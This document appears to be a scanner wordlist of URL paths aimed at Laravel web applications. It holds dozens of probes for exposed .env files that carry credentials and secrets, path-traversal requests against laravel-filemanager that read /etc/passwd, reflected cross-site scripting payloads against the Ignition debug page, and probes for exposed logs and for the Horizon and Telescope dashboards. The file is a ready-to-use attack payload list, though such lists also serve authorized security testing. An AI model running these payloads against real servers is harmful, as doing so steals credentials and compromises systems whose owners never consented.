/.env
/.env.dev.local
/.env.development.local
/.env.prod.local
/.env.production.local
/.env.local
/.env.example
/.env.stage
/.env.live
/.env.backup
/.env.save
/.env.old
/.env_1
/.env_sample
/api/.env
/.env.dev
/.env.prod
/.env.production
/.env.www
/.env.{{DN}}
/.env.{{SD}}
/.env.bak
/laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd
/_ignition/scripts/--><svg%20onload=alert(document.domain)>
/storage/logs/laravel.log
/laravel-filemanager?type=Files
/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd
/laravel-filemanager/download?working_dir=%2F../../../../../../../../../../../../../../../../../../../etc&type=Files&file=passwd
/_ignition/health-check
/api/stats
/horizon/api/stats
/telescope/requests
/_ignition/scripts/--><svg%20onload=alert(1337)>
